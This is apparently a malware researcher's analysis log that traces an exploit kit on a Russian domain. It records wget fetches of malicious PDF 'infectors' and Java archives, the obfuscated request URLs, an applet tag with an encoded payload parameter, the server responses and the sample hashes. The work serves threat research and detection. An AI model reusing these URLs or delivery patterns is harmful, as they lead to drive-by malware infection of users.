HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946 --.--K/s
21:51:14 (26.47 MB/s) - "column .php@jkmflr=30% 3A1n%3A1i%3 A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]
// Get the PDF 1 & 2 infectors.., knowing that x(pdfver.join(".")) evaluates to "1k:1d:1f:1d:1g:1d:1f"
"/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
"/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
↓
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
// in short, the download logs..
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575 40.09K/s
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781 59.75K/s
// And the JAR...
// see the applet URL...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20 --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]
// hmm.. the jar fetch looks like it failed (a 20-byte gzip body).. :-( Let's reset the "request":
// retry - try1 (old java version)
--16:24:19-- h00p://dekamer ionka .ru:80 80/forum/links/column.php?cabimab=lij&ymwbck=rpe
=> "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php?cab imab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 16,786 (16K) [application/java-archive]
16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]
// retry - try2 (newer java version)
--17:06:01-- h00p://dekamer ionka.ru:8 080/forum/links/column .php?cabim ab=li j&ym wbck=rpe
=> "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
:
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]
// both jars were downloaded successfully
// (note: the ETag served with each jar is the MD5 of the file)
bash-2.02$ date
Tue Jan 15 23:14:51 2013
2013/01/16 16:24 16,786 try1.jar
2013/01/16 17:05 22,600 try2.jar
2 File(s) 39,386 bytes
try1.jar e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar 2af29d21c006b5c106bd7760f19a2bf5
:
#MalwareMustDie!